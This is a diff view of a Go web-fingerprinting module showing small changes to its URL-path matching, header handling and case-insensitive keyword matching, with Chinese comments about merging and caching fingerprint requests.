     45 + 
    38 46  // 合并所有指纹需要请求的链接,也就是合并所有请求,相同的只请求一次
    39 47  // 会多次调用,所以需要cache中间结果
    40 48  func PreprocessingFingerScan(url string) []string {
    skipped 41 lines
    82 90   
    83 91  func CaseMethod(szUrl, method, bodyString, favhash, md5Body, hexBody string, finp *Fingerprint) []string {
    84 92   cms := []string{}
    85  - if 0 == len(finp.Keyword) {
    86  - log.Printf("%+v", finp)
     93 + if !strings.HasSuffix(szUrl, finp.UrlPath) || 0 == len(finp.Keyword) {
     94 + //log.Printf("%+v", finp)
    87 95   return cms
    88 96   }
    89 97   u01, _ := url.Parse(strings.TrimSpace(szUrl))
    skipped 67 lines
    157 165   }
    158 166   //log.Println("FgDictFile = ", FgDictFile)
    159 167   bodyString := string(body)
    160  - headersjson := mapToJson(headers)
     168 + headersjson := mapToJson(headers) + "\n" + headerToString(headers)
    161 169   favhash, _ := getfavicon(bodyString, url)
    162 170   
    163 171   md5Body := FavicohashMd5(0, nil, body, nil)
    skipped 49 lines
  • ■ ■ ■ ■ ■
    pkg/fingerprint/matchfinger.go
    skipped 7 lines
    8 8   
    9 9  func iskeyword(str string, keyword []string, KeywordMathOr bool) (x bool, rstr string) {
    10 10   x = true
     11 + str = strings.ToLower(str)
    11 12   for _, k := range keyword {
    12  - if strings.Contains(strings.ToLower(str), strings.ToLower(k)) {
     13 + if strings.Contains(str, strings.ToLower(k)) {
    13 14   x = x && true
    14 15   rstr = k
    15 16   if KeywordMathOr {
    skipped 32 lines
Please wait...
Page is in error, reload to recover